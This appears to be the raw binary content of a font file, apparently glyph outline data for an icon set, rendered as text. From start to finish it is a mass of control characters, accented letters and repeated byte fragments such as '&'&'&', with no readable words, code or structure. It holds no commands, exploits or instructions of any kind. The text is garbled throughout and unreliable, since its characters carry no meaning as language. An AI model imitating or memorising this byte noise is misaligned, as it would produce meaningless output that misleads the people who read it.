þ		

		
^

		
£
ø

		S
p

=

	þé	
	
@	
	

fìýª
S
E
	
î
þO
f	
Œh

þ	
:

ü"P)Q&&þì		¿
:"¶
È&æý‡%B"))³
v		þõ&&LyþÙþ‹"Ù		fþº		sè	







þÖ



×
Š			Ú
‹
	¦

	ƒ	\U		4\

&
®	
	ã

ª


.
þ¸D	þ´*í				B		?	½Q	
	29
3†
		(
G


M		Ž	*
þ¦	Å
 	X=	
þˆ
		
{'

C
	
	bxQp

I


‘
			4

þ	



h
	

ø

õ«
ˆ

	
–

ýö
Ó
iy	
þ'

û
þ	
òþ‡	

¥
	Üþî
r
	é""…))D&ýÞ	~b""³&&«

þÝ&&p""´){

5		ýó&£ý¢""P		ü¼}5ÿûígn~¨¸Ã&'&2#54&#"#"=3276&'&'&'5&?76767#"&'&=7>32#=&"26=#53>'#733'##'##733737#"=3326&'&'.7632#54#""'5326=3#'##53'3çJHtxˆªƒ	
	"'EHJHtxˆ¸#

&DEý00p,
+d

&	!	

	aFw'(µ&5				
	 D& 8

,
4	 Bm^^jj\\\\jOOj

	

				SSSiTTiQQèVFLQ!	##'"'#7#"'76764'&'&'.567>312&'&'&73532'#32427ùïþy’6Y
"2<4/-3="6+ JUVbGDAD4þã #
VþïþÏ^--=
!"
;	 Äêê4718“OO bÿi¾R'\™ôþ%#"'&'&7#34#1#1327>70150#%7#7#7#7676&'6'.'&'&'&'6&'&>7&'&'&'6767>76767###'35'.&676&&'&'&6&126=;>4&"&/6?54&"32767>7264&'#&&'676&7'%'&'76&»)€NRWpk@AA(*B?mpƒ_VT‚'þl
			
%L	
4.494& /)%^x2LB;	
;
u%)/ &494/4
L&

	
'g(
<<BK28/:K<{T€

€U{<FpSt#-.
&!



./$7


!

-(<uSpý™"j''k!}HnA@kpq:ŠK‚pm?B#!|R˜TSTS:45+'Se;#-)N	"&>6.(
::


ý»Ì(.6>&"	N)-#<dR(+63:STST	E

:þ+?#LL#?'F
,	'"
#

#	,(F'þþ&<
	;%ÿj¦RIV#"&'7&54>2327654'&'.'.54632".547&#"7"2>4.‰
Uzw¶02:2!AbF0.&#¢),<¤sNO@12:2
 8FVLZ\e@$¼"9""9D9""9)
R22/J*(A&'%DHM(f!6*22>1,@''CQ-(*02¯"9C9""9D9!ÿòÿŒ1W&'&"2?6&'#/&76'676'676'67665677?kMe`he»DS!&¢;þ¡tœ¿/ÁŸþø9áÊ#DŠe'"/_ˆ)2	ÄÝ5
òöˆT,)OI`hu…t¼¼xóÌs“z=Jþý03:þ€
¥7þ
÷ýêþä(þ[…35þÐ

ø>è­#'3@LV}53254&/&'&54632&#"#"73#353#3#335373#5#'353#3#335353#'753254'&/&'&546323&#"#"
"k**QkC::E"7&'5(-,ÂmD;;F1506„	"	
™––"#˜aa˜lnnl˜#$˜ff˜gg		
	ÿþÿÌëñ8i&'&/&'&767&'&3>.'.'#&767%>&%2767&'&#'.767676776767>ß3{w
(G&í	(
nr#!#
¨þlB:=9bYccž,	
%J2&!8T#
-\(2$ R ì¤R-L[	!	=!"5+ Æ
/#9 ¯+: iF/"@ õ	=1

R)/+ÿüê±IVc"'&'&=&'"&'&='&'&/&'&76765476;276767>2>4."!2>4."Ù*;!#c%
4L'- .
I-GA& "!)-&.þ¢33<33þû33<33Ê&	ž*#’ž
	+«	+
	"2<33<32<33<3ÿùÿcïY"J%.'&'&'&7?5&'7767676'&.01&'&7>lM034ž&)—	A&B4LL	rn1±—	A&^D"
686?-"(,9\,-^&)õ
/$=@NWZ$	A&ýj&)!µ?>,o–&)
DK$,	#7-

+FId*Y	Aÿÿÿ|ëRhÁ%&'&'&'&'&6?67676&'&&76?4'.'&#"'#&767676676767676''&"'&&'&'.'&'67676&'&/&'&>6&/&7>7676?6#è
@0+"
!


aH°q*	
	#%
)*0A	
0R%.<WR "D!1
dRDwDUc3H51#.		
E(=~i 
	&	?$17d*%?	#
	
':!GY(z.B0L$	

 	B).


%
?	
	
	<32?
	,(B+2		56(-,(>	<307J%=H+0ÿüÿgìS*N$&'&7676766&'&767676&'767676&'&'&øg^[Š$&GDqvþóå@DEDptµ(+'‡cN!"(*1<eKþr4#&(<AOW_hT›32'7=-1!.)6.5R)(\`h„qn@AŠrx…qn@A¶&8YGT#<'Ad%þ´,D@C04<l¸7V"
!è·[l|Ë +&33'&/&+"32##";6'54&+'&'&=&7;25&547>76;2=&74&#"7676'&'&'&767632'&/&'.676;2=4*/&'&'&'&'&#";276?27>&%<#"'";2&/&>326'56&+"3+&;22=4+"=4?6?676736× ?	$!Ye	N(þ¾",// %	/: 
&
û"

	&E

! B5 u	8		@*



°L*(_
N]:
(1&
	/@
& 2
9
?
	&>

!	6(
$
è1")<557;5#&"'&'37373&"&'37!67654.#".#"R
K*D*@*f?
Ž<!7!;^7(Hú,©,QÕÝÐ#JþÂSþ¥Zþª\ þ# 2!8!
4W2è-AS^ht‰•œ²¶¿"#65#3532656&"'546327%4627&#"#"'32654'&'&'&676?67654'&'#7.'6'&67654'%#65#3547&535#5#33275"&%676764'&%&'&"165#354632356&3#7"264&Í"$,|þÃ! $	
!&	
Ï-260)


	%
þ
("6#$
L7¸8D^XIþÉ&O&¾
 r
Ã;($!u*+2X
 
	•/0

5E:Ú,=7$#*&¥()+&@E"
‡7=]A3,J
o9‘1.3	¾)u4)<«
‡A
W_‡ÀÿbÕR»È%.>&'.'.'&'&'&'&'&7676'&'36?676763&'.'&'&'&'&'&'&'&6766'&'.'&'&7676?67676'&'&'&'&'&'&776.>c
6868ª-'%1!+%:$&		
"#'
	)	

4v*(Q*


	P,

@*1	


$	
&"	
,9
==Dƒ;XXD;WXE7!":B";ëO-;	),E;-#
+"+6&
&6&-	 -) 
4'4(-8S8(	$4<L
				
,!*.
 #2NI‘(-Â2bHGdbHHÿþÿjèWÎõET®Ñáèò%051'&/&'&'"/76765'&'&'&?6/7676?'73>767676?>72#?6767&'676765767>/&767#&'.?676?63?674?4767676'&/&'&7676/&7676?6?3&767676'&'&7676'&'&'&76?37&76?676/&'&?67>7627676'&/&'&76767676'.'.76?676/267>76/&676?676'&'.767>76/776/&'&'&76?2767'.?6767'&'&62767'&/&'&/.?6&/&76?6&/722?676&'&'&'&'7>67'&'&5&7476?&/&'&'#&5&'67>565"#%'&'767676'&?767626'&'&67#"7>76"'&547>7665654'4'&#&"&7676"'&#&&6767&'&&'&/66'&'&'2767676&/&'&'732676?3767676?3>763"&'&/67676767676&'&%372?5&'&"67#'7'&'É


2D{rš|iŒB!
!-	


		



"$	

!		
		



	

	*
  (
	
	 *			(	
."
	



		
5>


	


.+	




 
	
0


"
	
	A			
ýJ%&
	"	

º/		07	
 )-

o	1(1.]^	

&!
	
	$
	!
	
g(1%'
$'/*þ“
K 
	O
¬›	 hXsHD>SšKY
	



	
	
		


 5%;94#/(+#	
		
%#
+

%'%,7# 
:@3)81
  
<1
-, !&9
'4
#0&9>;


&$ (
			" 
!$

!M>2K	 ('-
	.2
&'KB	8:4***"'	
"$"	

	
82+7'IC*$ 				


Ã3
%"!-	
6	+D	

L
y

-#
	


"3		
²:
'<

	ç	þ½A	
è÷#?#"&46;5#";2+3264&733535!35#";5#"'&'&47676ø¤

ââ#12"¤òò(77My5xþÚϬ¬((¬¬ƒ52E2"57O7?üü566
&z&
5
J
è…/@M_"&462#"&'%#".4>32>?54>2%.#"327'.>%2>4."4&#"/3266L77L6%p(D(4Qþë#,#<##<#.G
5(-LZM-?ý++&66&+:#<F<"#;F<#:)7:;	4!):Ý&66L77Á`	(C(A1^#<F<#9+[y-M--M-5VI5L5949#;##;F;##;þ½)9
:3'9ÿoÚM2%&'&'&'&6767676?#676%3']Gf.7/4*,ä<H>E7:)&ý•2Gfpþ;I=E7:)&kZ0B
þ¨?7/( 
²
$0B)X?7/( 
þN
ÿi[R$%&'&'7676.>32[	$@K"i&27$+ÒY5O?"":"þ&%''VF7L5+%ÿiRKZi"'./&='466?6&#%"?>76#?72736&6'4&#&+37>%"735#"É	3+¨8þŽþ
	rZ 

	 
	
ÑÐ		þ?-Y-;M'¼'O<,Xc.3
óE¢
 B$<º]	8h
 þ©þ©&: "54hÄ´NNÄÿeÛRC'.?6767676'5#'&'&'.76?7276?6'&'&[=r;
4B %<)
3;1>%JB!Mn7\H#
6F*U
s`«UOP(	
O9
<0ašMkIbÿj}R!.6>AW]{‡%276764'&'&"2".4>2>4."#335373733'771654&+35323&5&'#5323#"'&476323.#"32735#35#535#35#733535öj[X4554X[ÔZX4554XZjGwFFwŽwFGwF$>$$>H=$$=ñv+ +(6 6
!6#¡M
 1##w 
		
# '&!<qEELklM[+ +H54XZÔZX4554XZÔZX45‰FwŽwFFwŽwFþv$>H=$$=H>$þ¶uu  X44
8
((
)
+A*NuuuÿÿÿlèT%6?&67654'&'&&'&47>"32>4'..46qk^Z6822WYÒ·6931UWu.RS^R0Sþ
*I*("&.*H*H) $/#"P32XYÓ\Y68eX\ogYW46ýÌ.(*h+'.0R14+(-q*I+'H*HW%$(Ø#0##/$èX33353!!#!5!5§¦§§Mþ³§ôþ³X§þ³M§§þ³§¦ÿ÷ÿ‘é-[454&'&'&'&6767676676767676"&'&'&'&'&
)0 :/5<H:gr(10	#<OT&2!$&-&<!	.b+/+]+& §4"I$$!
=7`'F

,Q(4
)			'npFH3"%::4VAP.+ÿfØT:Piu–&'76767676'&'&'676?67'&#&/&'&'&'767676?6776767676&'.676%376?676767676&'&'&'&,
¡°[EXQ/B:LK[dP)< 

ý¶u•]Fwªó7	0
&'|{n+.:87=-.%-6/((	n@B$?J?Q‡[m
(/m$.#ü¸3'*:8E=H9&!*2:0=ã²$š†G$
+53!18/0
¨C)-
*.BAFI*þÿ$<"!2+=
q‚(

**79Q++/G6BC	
{ÿÿÿ—è)=`67636&'&'&/&&''&'.#&'&'67676376%/&'&'&#&'&/676762õ ®‚(!( $ '0
8%/&"+Xf34	
,8`HT±‹0
 |¡ˆœ¿Š&
	:Àa˜í@+ŒK˜

;

 	(	è²)6Ke•¹Çæ5#'3#"'.547>567>'&%37;5#55#326&5'3353;5?25#73653.5?65#3?62;57+75765#52='76&'.+;26&546326/&'+5432&572=#5325'#';5|$%	"
"
ü…
'‚F
5!1
	š::0#
3/
	!
|
$;
'#
12
 0O#&
: 
89¨@,¤%¤‘5(,,--l+@!y
(,\)
–
#%3		'˜5è×4<&+3532354'%+6=#+5#326?32?6=33535#·&…[
		[¥		
+[ 	[„"
W&2ü=[<Ô½ò—		Zf$KZ		fZ
	—ò

92&f[——[è¬8Vksw‚“›¢®&+&'&47>2354&'#"#2+"'&=#654&'1#31276765'&'&'&''1'&5'74616'33535#!3#%#3733'7'2167676#32674&'32+#532'#5#35335#¦
	(
		

		($.0
×		  

ö.,,†{**><.,1,\|	/QMH	
ì0++0**i
!

		&"H
(!!
\		%pp%•••>33
,•(
8<7•99•ÿòùŸ;Zr†™­'&'&'&'&767676#3'&/&'&5'4#&'&'&'&636767676'&'&/"'2767676767'#735767676'&'&'&'"67665&'&'&'&ÿŠyZ;73%GTlge•xJ131(ITjPþî.,pSCL%	.@+
®4_MA *,	6Zµ


#$G%?#DG Ÿ
QF(=²	
	_Ÿ1&97>ZS=/6;%57=TP@-5—%'JJ7_	Lp"#
þb0)5CF4,
50:7*þcM0"

).4<þ+5+:
	
"
8.:¥5%00?è·1ADTd"'654&#"'54&".#"327326?3264&%45?3275.#"&4>27>54&'327Š3)
ù)8*ž+'77'›)E)6T
ö,'77ý	¡)/P.Ï>$%>J>%1åâ+4"R(6e`)
N))
C7L8¿$)F(F5Z7N7yW3R1.  "L?%%?%+F QW3*I&]ÿiãS'YhtŽ'&'&76?2674767667676'&'&'&'&76?67&/.?6&3&''&7&6"32>4.%2674.""2>4.?&@CT*"O
EJ%B# *
ýÂ
	+0G(#	=* 3Pt¢dLLQ™Ž)/þ%*::(.-œ(8-5/:...2-.W	0)@!%	ˆF
*7/4,"¼7H<.C,
q$94/#8G)41&"‡°?‹Žs3'+d M@K<Å:R9.5-Ê9(/.+9ý¢-4--6-?ÿXõW.Xdr{|Ÿ²ÆÞå%1„ÉÕçö&0JW²»Ë×çFy…Ž”Î->œÆÐ&/KYŸ»Çåîø,NY 2lt‚6376276'&'&'&/.'&76'&'&'&6&76327&'&767&'&'&76&6/&'&6656'&'"767&&'7>75&676/4'&/&67676&'&#"6?676'&'4'&'&'&#137>'&77276'&'&'&76&'#&&'&5476'&"'&/7>'7676""747676&67&'&/&'&66''"'&76767.''&5476'"&"7>'&'&/&'&7'7676&767#6'4'&'&7254&#"654'7676'&""67676?676/&'&76732"6'4&7&364&2674''7623>'#"'.67.'"776&/&7>?67676'.'&'&'47>767&'&#&76'&/&/.676?>'27&'&%."723>&5&767&'&/46&727&76?6?676'&7>76'&6'"&=&74'>'4&5&766&'.6&'&676&'.#'&7>#"'.'766&3676&'&/&'#"'&76'&'&76?>'&7676&>5&7>.'&'&&/&'&'767.'76766?67676&&56327'&3676'.'.574>&67676/&'&'&76'&74654'"'&'&'&'&'4/>67565&'&>'&"&76&'&'676'5>71"&'&'&&36736?>?6?>17>5&"&'&677'&676'&%7&'&/0'7676'&'&'6&'547676766'&/&'&'&676676'.'66&>56'&/&'&'&737>'.'&'&'&+.3265&'.327676765&'&.563.627676676762&'476.'&7"'&6&'&.76'&>&>'&'"32?>6?>26?67>76'.'.6236'&/&'&76?>5#"'".'"&"&'&'&'&'&'.'&4654&'67676&/"'&76?6.'1&&'&'&'76&&'&'&'.'767765&/&67636'&&767&?67676&?6767I8#%	8
J%
	

&d		­
	Ù

	
V

	-		f$'$*#8	

%*		
	
	{
, 
—	


		

ýî




	þñ
þó

#



^	

	#	
		


	

	
	2	þ5*
	
 ?				&	



	
Ò%'
	

,%7	E($ß	
	#Œ#	'	
	:.%@#$M
	#FH '/
:$#	:°%(*:"
'
	á		
:O#Y

)="		
	"	
{

 1


-	


	!#"		6	
		üªP
3$&9&&	
+		
ÿ0	
'6		$
86# 

	
†N




!
	
	

		Ô

-(

þŽ-		5				 "



	

			
		,
	r



	
	3â	
$';			M
."	
ýU

#E
Pý-
	
	<7	
	!			V;	
	
	

Gþ\	
	
	
	
		
L

&#&6!#	5	
) ª	

	6
	3		y		
(œ

ä		 	þ		}
		
	

	
Î
X*
þs= 
			
		0

9@

&F
‘?
'%6 '%+Œ“þÁ	
	
	
'
4G=	/_	


	
&

!
.%!
G
”	J0J#,

	%	"	Š
		7þç"
	

		'/, š

Ï
þÚ$+
*&0
N@$

!	
þÉ	4	
û
þO	



	$	7.




þ /%
"’
	

5	
)'
				

"			l

;		
	
2	

		
èÓIV_py"'&'&'&'&'.'./&'&'&'&37676?67>6=6&%"2>4."&462'&";25'476'"264&Q9

1="

(! 56>55 +,;+*á#þË

#"
&*
$
  ¼6?56?5½+<++<+¹¯¨\
èÍ*23AQVd~ƒ’ 5#35&6765&'14'.167#'&'5676'3'#37#&6?#62335#'135%.'&#37"&'&15#3547>354%135.676&"'&76716\*-

<
90+
ñg.	!	.2Éy,B|Gm,
"Dk

+,		,þ,$%35


y	E	&T%

#	8%]`)!#J!#mH1+H‘e	P
WS[((C	" DG


ÿjÍr>Wg‡&'&'&7676767676'&=&'&'&'&/&'&76763"'&'&676'&'5.&'&'.>32$&>3267>¬-2VþåNb&š	
V,
Ž›ž$(þ>BpC5"
	


FV;"

8
'þØo
0*'[# !0,>OZ7;A?eN¥±«2

9s^.
&&™«&FuE

A/2 	d
]A@?q
9+þ¦y%<*+5"R)(
6ÿöÿkòE9>76.'&'&547676'&'&'&7>7676¢>VŠV	1hE>zZT@
e
_DC<97®hƒ{xUWiOScGDG#
h”UK†\%Z>Bz]	
f#,ONÃdhYWt((Z\|`b_£7:ÿüÿgèR 5\hptx&'&'&/#76767676="'&'&476762&'&'#""'4/7676;276>76'.'>437'&çVm¯.4D?z­20§hFH°ƒ}&	þueb9;;9bdìdb9;;9be£$',V<Š6$9p&_<¢8'?
É8ýÞ(M>sÖùb`eb^cb€“s“++ÁFDk_^…qj¤(3þC;9beëdb9;;9bdëeb9;Š,]º#0yòb1‘lþ _392FþC!…™€g.­þGò¶áÿo³M$1=I"2674&'&>&7>."265.'&>&%?64.ô(#(«×,î
Bî-×	±(9(™î	×,ý‰î,×
Mþþþ–•
2/
mEm
01
•Öþþn•
10xm
01
•ÿh¤SC|—£´ï4&/&'./.'&'&'&/./&7676765&'&'&'&'&'4?6?676?>?6?6'&'&'&76767676'767>'&5476767&=%"/&'&75"1'&'&/2?6776&£"
2„A	K
IG§CM dX«5]Pp&(5?qD9	=
#
›ž
69–)3*9UD/	=$F#
(*3þï
	!3

+; /o
+		
./cZÚ¤A)Fvå
*¸¦Že!?ux…"	/	3	$$	3	
7ý(LW& &&J,	M#þ»TDÊ
,¤Ð âˆþñ

‚¹
&
$Ha=	[t 	Z?nM
U/E-ÝÿjèR0r#"'&547676 "73276764'&'&&/&'&/.'&7676?6?6'&/&'&'"76367>76èCAos…~oþðYGCAos
soACþp`]79&4Ÿ2s>p`^7887^`ˆE

2M	#BHC!k„rnAB<Vu‡„rnABBAnr87\`oB?;4˜2!#86]`Þ`]68ýö"!D1
CH,,$D&+ÿþÿPûDktŽÆâ'F_x¢³Ê;bß+“«Ò@|Ðó`¨		$	-	=	@	Š		ž	ª	¶	Å	Ó	å	î&/&'&'&'&'&'&'.'&"'&74&'&""76+."'.74/&76?6'&67276?6'146?'&76?6>3'&76=>76'&76?632?>.'&76?67>/.'&'&7676'&/.'&'&?6&'#&&76?"5676766?'&>6767>&76322?6376767674&/.7623276'&/.6276/&'&'&'&7276'"/&76767367>&/&4762"'."'&?>2?6?67676?6'&67>/&/&7>&5>'&?6'76766767&65'6?6767767676?6&>77'&?464'7627>>276?6&'47654'."&4767&'#.&6767&6?6;2"&&76767">36?67&'7>#&%/67>7.&'?676&?6'4'5&763>7/&/.&767677&'.'&'>#"&"'&'&'&776&#"'&6736#;&4&6=2627'#7676&67676%?67632+"7273676764'.76?63276767>'&547>'&'.&'&'&5"&7>&#&'&77676&#6764'674&4.'67&5476'&?6573267676?>'&6?676236&"##'&76767>'&"&?6'#'&76'&'"76#"&'&'&'&'&';26/&/&'&=4&'&'&'&'66'&776376'.'&+'&76/&'&&/&'26/&'5&672&'&7546276&'&"&'&756&'&'.76#"'.2/&7654&54&/&'54'&'%6?6'&6?6%6&6&/&"&'&/.&'.7636&'&'&'23.&632&'&&76'.'#&?632?>.'&676?67&546766..5&76&.76&6767'>&/&6&#"'>762263'&/.7676&'&?67632767>/&4676763>'&/.'&542365&'&/&1"&76&#"77676'&'676736>'67>'67&/&'&67676.'&6?676#&#'"?676676?>'&4767676676'&".76"75.'&4?>?6?667676'&'&'&76767276.1"'&>?6&'&/&76367/.>7'&'&76376'&271676'.'&#+&74#&'26;2?674&6326=4#.6764/&5&767676'&/.&'5&7>>76'56'.7>'&'&'46767676'>'&'&&"&6'.&7>'1#7676#?6?6767>'&76?676'&'&'74&&/4?>'&47&'767&637476"#>'5.'0#"37624"'273264&&#7%6&åv

	
(	

$		
		
 
	

	

	
	9;	 	



.$
	
	



	

	
$2
	



			
		

	
	
	
1	
%		ğ_	8w+ 


N#	


	
	(
	
	9


	
ˆ
	

8		þ" 	
			
'


 ,	

 
0
,=¬		+(å
1	/9



*'7

	
#D
(12
#	




$,		
	
			#Ä&p_
ý


o˜		K. 		&
	57$
30+GB#			‡
0
$<


		
			


x

	
	&-#7-
'
!


.			&	
þ»?3

		
	
(/(7


'
	 		#	6	þf

	


	




		L		
	


	
		$
T'
	
		ý¸
þÚ
¨¢‚			
	
				




			
	



#

	

 

			


		


/
	
		
		

	







			
			
	bq


'	
					¤ž
	Â

		.


		
	


	


		ª		
			þ‰




!N

	/


	
		


	
	$ 	
6


þÜ
			


	




	
#





	
 	
	

66

!,*ß8Nå
ë
d
¯	





(	"	

		
M	


	
	



 
		

	
	


:	



	þ‘
	

				#	
	%K
	Œ
		


2	
LO	!	"
	

	


	
	


8
		

j1(	





&+/#


a	
Þ


»
	ÿjçR%
%%
%—þi—þiÈýäýäÄ8þw+þv8T»Oþ&2þ(Lÿÿÿ¹éû>L%'&'&'&'&545737&'&'&'&=>32>7653'&'6764.ö`lOEC()84\<iXB2!6:.AGwO;<mI=@EA94#E))BEN\¹ŠE
þ >jG>	"G-jÖP6G!9"’`@EJ'0eF#Öþ>M‚X
‚BQ‡
#$dÇcWÿ¨ª&/„š"276764'&'&&'&'&767'&'&'&'&'&23673676/./"776?>/&'&767676767676/òufb:<=;dgêfb:<=;dfþ 	ºìty&%/y2@B	
	
;U	m"+19? -(2(


	
*~
<:bfìgd:==;dgìfb:;ýÂ
 #0/;5þ	!'¿Uþ±>
¨þÿ§
%	 

hr#)03,-$$0*"ÿ¨ª3C!+"&54;2+"&54&+"+"&5463!2+"&546;2?kþccÆa*Óbq#=#Ãccü”lýlþõ*þ£½#=$þ½ÿjAR "'&'&532>4.+532ô[MK--¾'ANA'&B'__ZNK----KM–--KM[›ýe&B''BMB&¿.,LM¶MK--ÿoãM™Ÿ©³È÷%"'#.'./7''57'54&'&'&7676756/&/&"'''#&"?>?4?6766?35735762?65/&%'.'&6?7'575'5462/57" 7676'&'&/"'&'".4?&547676?6762'
"»Î&Ϻ$$	ºÐ&κ!


a†
	*!*%%*!*†aþ|<
<&s$&&$%%
™=&<
ƆtpADDApttpADDApt;9Y\Ò\Z9;*'42WYj
jYX24*á!l#w+w$k&#……
&k#w,x$l
	b#

×ïï×

#b&#
	#+YE
þÝ#+#NDAptþôtpADDApttpADý2T1221T+V^l][8:<<:8[]l^VÿuèG.AXbt~™¬!"3!2>=4.###53#5"&=3276753#"'&'#3>32#26=3#"&=462'"354&'"326=4&357##'#276=4&"7462"&52673#"&=#1ý†2T11T2z2T11TýÙ;9;¯§3"3
3·33°a
4&&"'*F%J-º		þ°@KB'*AMá'.H.
À!99
9u1T2’2T11T2’2T1rþÛ%2þ©ÔÂ
ÀÉ
Wo  H0
&((&r *&$

ƒÝ——ä" ) ‘#*à	
˜

EÔ
	ÖéÿfÏT/16767676&1#'&'&'&'&'&'&571'#'#4#/&#5/&/#&/&/5767676767#'&'&7676737276767676765#6'&'&'&&75676767676/5#4/4#&'&'&'&'&'&767>1#1""""##/"/&#'"'&'#'#.7>76æ<^KC	tv6!X>6C>K=7,'
/a	;YEN+.&&!.c]oL<!
,D:8>B51#1(G"3D?EC92G
>+j. $	 &736'!0$di,9'
!;N
3FZ0_ZaA[K6'(W(&ýÜ&- 	##%£1	2=0UNT*)-"82aA	#)7b_/-+-#c9"/;/9 !%&+'
 0!A/	)%($$%2.;6:,'\yA/[E5D`ls]	ÿЪí'3AQ_o%!"3!26=4&26&#&'&"3%2.6254+"32654+"3%2654&+"3#254&+"3!26=4&#!"3!26=4&#!"¡ü¦[3ø|Lš…|Ò[[È\[[þQüÿüÿ::#p9$E=|ýË=þÃ>þÂ>þÂ>þÂlþnÿȪô $(,0!7654'%'&#"3!26=43#3#3#3#%27567654'.'&/&'&'.467>3267&/&'5&"#"'&'^,
þjþjS1ý&:Y†KKzJJþUKKzKKq
"
		

		")
"


Úïï	þ+*Õþ‰wþ‰wþ‰wþ‰.!
())#



)	ÿäªØ+9HVft„#";2654&!#";254!#";2654&3#";2654&+";265&!#";2654&+";2654&!#";2654&+";2654&€<<‘;;þ“<<Á$$XþöBÏBØýèýèýèýèýèýèýèýèýèªW$2".4>!!4.#52>5!3"ô%>%%>J>%%>þpkü•!8!!8!0!8!!8!
/Q^Q//Q^Q/þXòþ?!8!œ!8!!8!œ!8!ÿôªÈGK[k%2654&+54&+"!54&+"#";#";;26=!;26=32=4+5!5!%"&5463!2#!"3!2654&¡‰þˆˆ‹‹ü‹‹&þüýv ý(صæþ""""®þR§þsÿ»¬3?ir26767676'&?4&'"#"'.'&#"#&>276#>#'"&/&'&'&/3%32>76?>&"ð +YIPC
OB&$m#->..>N	DXMc*

Ê š	,!þÿ!,	': ´f;'	þw.)!',01 AQ
a-)
P>/>;!,&›	þ	#D"**!57
;h6 :##9>"

 : ÿöªÇ(!"3546;2354&3!265!!"!54&zþõ@	É@ý²ü•6ýkÇA%%AýdCþ½ YYÿ¨<M2>4.";6".544.+"/.?6&/&4?#"3!265ô4X33XhX33X5
:%6(%?J?%Ñ,K-}29
:2}-K, " ^;dxd;;dxd;!%>%%>%0þ6-K,
{UU{
,K-¤  ÿ¨:`3".=46367676?2#32676&'.=4."#""/&6?6&+"3!26=4.Jª3##4«	.O\N.	g]ZZ]4!Æ!3†4..4q.O..O.qP	ˆˆ	4ã""ã4ÿ¨:´"&462"&462"&462#";'&56767>'.'&"&/&&/53264&+";;3127676726=312=4.'&'&'5>=32654'6?6=3264&ø	N%)/$

(b(

$/)%N

	KG3+	'1@ED@1'		+3FK	
7
ô
f
$
?				þÁ
$
f

sG




	


Gr
ÿÀªþV^dmv€Œ˜¡4."2676%4>2".5>54'&'5232654'&'54&"&'&'&'&"265'&5467#!264&!!2>&#32>&!"3!264&!"3!264&264&#!VH{’zH%#{|#%þ54WhW43XhX3Ê(/+
		
#+(
)
'3ï  þÜ3P§ úì  ýÆ  :  ýÆ  :    þ¯3ñI{HH{’><HH<?H4X33XhW44W^%"%
	B

"#I

ƒ	 	wƒ<1 - ŠI$ - -1 - þd . !- Š . - C - 2;
ÿ¨Ÿ>GV~‡–¾ÇÖ'264&"';2"&4326=4&+/&?6/&?#"264&""&547;2#/&?6/&?#";26=.7264&""&547;2#/.?6/&?#";26=4&%264&"';2"&54#/.?6/&4?#";26=4&'26=!26=!26=4&#!54&"!"ø##0""
")§	&&
 "0""0"d"
&&
§
Á"2!"1"d"
	''
§
ý,""0##"\&&	§
E	





	þÍ

þÍ	

Ž'8''8'U
 Ï
2%%2
þi''8''$
Q&&2

2S''8''$
Q&&2		2'8''8'U
Y&&2		2Å
	XX	

	XX	

	n	
B		B
	n	
ÿýª¾S`pwŒ˜7"&5463!24&#!"3!&/#";26=4&+"&547673264'&+&'&"#"327%4&+32656=4&+37667#%.'#"32>54&##5#53533†€ý&ßû,
ü

+ ^
vÓ¼

¸Õ	xG_>"%@21@%1R0B;4::4;Xï	!ý©õ,

 ++!!,¾	{
{$72AF%20R1$B€;;4::ÿ¨©,BLW76&#!"3!26!"3!26?6&&#!"!76%463!234.#!"!76&#!"7!74'&#!"ô
	þ	
Ï$þM	 
Çüè& üÿ)$n#%7$5ý’6)[8
ýÑ	BÈþE
f"


"	H
sÛÛ3##þò 56þï°+4+ÿ¯ª
/?ÊÚã#";265.#";26=4&3#";26=4&7#";2654&&/&676?676/&"/&"/&"/6.6.6.6.'&"777?>7265>7>/764'7'&"2?64"&462ÈbbØabØaaØbbþÊr2	
IF
%
&	%
&	&
%
.J
J.
!
NId#d#=
oþruýýýýuþrP#	
u

!
HE
%	%%
%	$
%
-I
I,
 
M
Tc#b"+ÿÅ«÷7DR^€Žª%#"&47673264&#"&'&"#"327+"3!26=4&7#326=4&#326=4&#326=4&#"=4&+"+"3!2>54.%46;2+"5#!"&546;2;2=4;2Ü
	f	"00ðçÎÉ
ðŒ=ÃÛÒ 6  6 ~ 7  7þoml°%ý‚%%ÒÜÃ%Ô/%$0	/#
"1â 
~~
Îhh 6 þ) 6  6 × 6 4lýë$%×$55$
ÿ©§
-=IYi˜¬¸4+";257#";26=4&#";26=4&3#";26=4&7";2=4#%326=4&+"!326=4&+"!"&5!324&++"&=#+"&=#"3!&54%.'#"32>54&##5#535339\\›]]¦\\Ÿ]]C\þi


ƒ


ŠþäN
 -""ð""-!!P¦I),L:!"9M+9a9!NF=EE=FÌ\d\\¢]]]]¢\\ž
r

q

r

q
þ!I ;"";;""; ý÷!ƒ! ;MWL: 9`9+M—EE>EEÿ¨?"B•%654'&'&'.7676.'.'&'&762767>676'.'"'5/&'&'467327654'&'&/&'&'&'&547675622'&/-$ 709)%D""D(C8/6#


!(90Š/:) 
ë"	"			$

%

	4&1VRG<5#
2,'1"	W;[
$4<FPU2)
!	
"!I,(	")(
	

 ÿ¿ªþ"276765!%4'&'&'&Ãi[X3553X[Ò[X45þ{ç6þí18HGÈ54XZÔZX3554W[i-OHF6þíŽþ{8ÿ¨—/?#";26=4&!26=4&#!"#";26=4&#";26=4&;23!2+"3!26=4&+"&=463!26546;26=4&#!"!"&5463!2¤•Àþ@ÃÝÞÝÞýx0FF.üÍÂýÃ=L““þê%%%%m%%+Uþ¤--¤ôTýÌ»þEÿ½ªÿ	-;?CG3!265#!"&5!'&+"6?26=2647&'.6?!!!!3#?&è'A ý…!ê³°¯‹
‹
þ––IM>
3HMsþÿþÿ¤¤ÿý½()Cýú""ýv¦¦…	

	…
µ'
0FJ:»,+ÿ©’ BF%.+&'&'&767676'&'&+";3!2656'53>=4!5!.1@!, 
'@ZJ&0
F
˜2
Ì		EýO±ˆ %)803(PE'=
>MN
 #d>	(€	1

'
j
°#ÿ¨õ$4>HR!"3!2654&32+"&46"&4627#!"&5463!254&+"354&+"34&+"Åþ^¢þòRR-Á
þ–


j

þð
6

Ú
6

Ú
6

üô-üæj


g


ý®Ÿ


ŸÍ	

	Í	
þæÿþÿŠé76Y‘&/&#!"&54632>&/&;23!2?64/&/.3!265&75&%6?6766?67>76765&='&/&/.à&:ýC0[		Z+'é	r­—		h
D"{Xnýq*{+rRLœ*8%~[-
{t
týb)

Zwm
V,˜V$F3&<º7P)”7>6	*T)~
1Zÿ§è 1DWl%7634&##;265&5474&#'"66'6&#"#2326=4&#'"!23265&474#'"!4&+"3!26=4&g
2&'OŸd
00	“22	f˜22	33…22	33ÓüVÒwý‡5ŠDþÙª
	þT	îxw{¹/ü¨ÿ}è?[%#54&#!"'5325474&'!;!"#";26=4&+5!#"3>5&54+5!#";26=4&ÒFþÃh*þÊiþºJ	

	ù


